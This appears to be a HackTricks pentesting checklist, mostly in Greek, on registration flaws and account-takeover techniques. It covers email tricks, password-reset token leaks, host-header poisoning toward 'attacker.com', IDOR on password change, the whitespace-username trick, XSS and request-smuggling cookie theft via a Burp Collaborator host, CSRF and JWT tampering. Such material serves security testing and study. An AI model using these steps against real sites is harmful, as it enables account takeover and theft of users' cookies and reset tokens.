Registration & Takeover Vulnerabilities
Last updated
Last updated
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Προσπαθήστε να δημιουργήσετε χρησιμοποιώντας ένα υπάρχον όνομα χρήστη
Ελέγξτε ποικιλία στο email:
κεφαλαία
+1@
προσθέστε κάποιο τελεία στο email
ειδικούς χαρακτήρες στο όνομα email (%00, %09, %20)
Βάλτε μαύρους χαρακτήρες μετά το email: test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Ελέγξτε αν μπορείτε να καταλάβετε πότε ένα όνομα χρήστη έχει ήδη εγγραφεί μέσα στην εφαρμογή.
Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικών (ελέγξτε αν μπορείτε να χρησιμοποιήσετε αδύναμους κωδικούς). Σε αυτή την περίπτωση μπορείτε να προσπαθήσετε να κάνετε bruteforce τα διαπιστευτήρια.
Ελέγξτε αυτή τη σελίδα για να μάθετε πώς να προσπαθήσετε καταλήψεις λογαριασμών ή να εξάγετε πληροφορίες μέσω SQL Injections σε φόρμες εγγραφής.
Όταν εγγραφείτε προσπαθήστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή επικυρώνεται σωστά ή αν μπορείτε να την αλλάξετε σε αυθαίρετα emails.
Ελέγξτε αν μπορείτε να χρησιμοποιήσετε disposable emails
Μακρύς κωδικός (>200) οδηγεί σε DoS
Ελέγξτε τα όρια ρυθμού στη δημιουργία λογαριασμών
Χρησιμοποιήστε username@burp_collab.net και αναλύστε το callback
Ζητήστε επαναφορά κωδικού στο email σας
Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού
Μην αλλάξετε τον κωδικό
Κάντε κλικ σε οποιαδήποτε 3η ιστοσελίδα (π.χ.: Facebook, twitter)
Παρεμβάλετε το αίτημα στο Burp Suite proxy
Ελέγξτε αν η κεφαλίδα referer διαρρέει το token επαναφοράς κωδικού.
Παρεμβάλετε το αίτημα επαναφοράς κωδικού στο Burp Suite
Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite : Host: attacker.com
, X-Forwarded-Host: attacker.com
Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού βασισμένη στην κεφαλίδα host όπως : https://attacker.com/reset-password.php?token=TOKEN
Ο επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στη λειτουργία Αλλαγή κωδικού πρόσβασης.
Ξεκινήστε το Burp Suite και παγιδεύστε το αίτημα.
Στείλτε το στην καρτέλα επαναλήπτη και επεξεργαστείτε τις παραμέτρους: User ID/email
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Το token επαναφοράς κωδικού πρόσβασης θα πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά. Δοκιμάστε να προσδιορίσετε αν το token λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι παρακάτω μεταβλητές μπορεί να χρησιμοποιηθούν από τον αλγόριθμο.
Timestamp
UserID
Email του χρήστη
Όνομα και Επώνυμο
Ημερομηνία Γέννησης
Κρυπτογραφία
Μόνο αριθμοί
Μικρή ακολουθία token (χαρακτήρες μεταξύ [A-Z,a-z,0-9])
Επαναχρησιμοποίηση token
Ημερομηνία λήξης token
Προκαλέστε ένα αίτημα επαναφοράς κωδικού πρόσβασης χρησιμοποιώντας το API/UI για μια συγκεκριμένη διεύθυνση email π.χ: test@mail.com
Εξετάστε την απάντηση του διακομιστή και ελέγξτε για resetToken
Στη συνέχεια, χρησιμοποιήστε το token σε μια διεύθυνση URL όπως https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Εγγραφείτε στο σύστημα με ένα όνομα χρήστη ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά διαστήματα πριν και/ή μετά το όνομα χρήστη. π.χ: "admin "
Ζητήστε μια επαναφορά κωδικού πρόσβασης με το κακόβουλο όνομα χρήστη σας.
Χρησιμοποιήστε το token που στάλθηκε στο email σας και επαναφέρετε τον κωδικό πρόσβασης του θύματος.
Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό πρόσβασης.
Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτή την επίθεση. Δείτε: CVE-2020-7245
Βρείτε ένα XSS μέσα στην εφαρμογή ή σε μια υποτομέα αν τα cookies είναι περιορισμένα στον γονικό τομέα: *.domain.com
Διαρρεύστε το τρέχον cookie συνεδρίας
Αυθεντικοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie
1. Χρησιμοποιήστε smuggler για να ανιχνεύσετε τον τύπο HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το POST / HTTP/1.1
με τα παρακάτω δεδομένα:
GET http://something.burpcollaborator.net HTTP/1.1 X:
με στόχο να ανοίξετε ανακατεύθυνση των θυμάτων στο burpcollab και να κλέψετε τα cookies τους
3. Το τελικό αίτημα θα μπορούσε να μοιάζει με το εξής
Hackerone αναφορές που εκμεταλλεύονται αυτό το σφάλμα * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
Δημιουργήστε ένα payload για το CSRF, π.χ: “HTML φόρμα με αυτόματη υποβολή για αλλαγή κωδικού”
Στείλτε το payload
Το JSON Web Token μπορεί να χρησιμοποιηθεί για την αυθεντικοποίηση ενός χρήστη.
Επεξεργαστείτε το JWT με άλλο User ID / Email
Ελέγξτε για αδύναμη υπογραφή JWT
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)